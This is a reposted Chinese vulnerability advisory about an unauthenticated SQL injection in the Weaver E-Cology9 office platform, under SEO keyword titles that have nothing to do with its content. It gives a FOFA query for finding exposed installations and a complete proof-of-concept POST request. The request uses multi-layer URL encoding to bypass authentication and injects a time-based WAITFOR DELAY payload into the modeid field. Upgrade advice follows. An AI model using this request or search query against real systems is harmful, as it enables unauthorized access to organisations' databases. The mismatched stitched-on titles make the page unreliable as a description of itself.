您的位置:首页 > 汽车 > 时评 > 课程设计登录页面_创建网站的三种方法_app优化网站_快速排名教程

课程设计登录页面_创建网站的三种方法_app优化网站_快速排名教程

2024/11/16 2:25:28 来源:https://blog.csdn.net/xc_214/article/details/143566143  浏览:    关键词:课程设计登录页面_创建网站的三种方法_app优化网站_快速排名教程
课程设计登录页面_创建网站的三种方法_app优化网站_快速排名教程

0x01 产品描述:

        ‌泛微E-Cology9‌是泛微网络科技股份有限公司推出的一款面向中大型组织的协同办公平台,旨在为组织创建高效、协同的办公环境。E-Cology9依托全新的设计理念和管理思想,通过智能化、平台化和全程电子化的特点,满足组织内部的沟通、协助、知识分享和流程执行等需求。
0x02 漏洞描述:

        由于泛微E-Cology9 weaver.formmode.servelt.QRcodeBuildAction接口未对用户传入的数据进行严格的校验和过滤,导致攻击者利用多层编码的方式绕过身份认证进行SQL注入,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息。

0x03 影响版本:

泛微E-Cology < 10.70
0x04 搜索语句:

Fofa:app="泛微-OA(e-cology)"


0x05 漏洞复现:

这里body数据需要做到一次请求更新一次,否则系统不会读取modeid中数据

POST /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: closemodeid=123+WAITFOR+DELAY+'0%3a0%3a5'


0x06 修复建议:

针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:
泛微E-Cology>=10.70
下载链接:
https://www.weaver.com.cn/cs/securityDownload.asp#

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com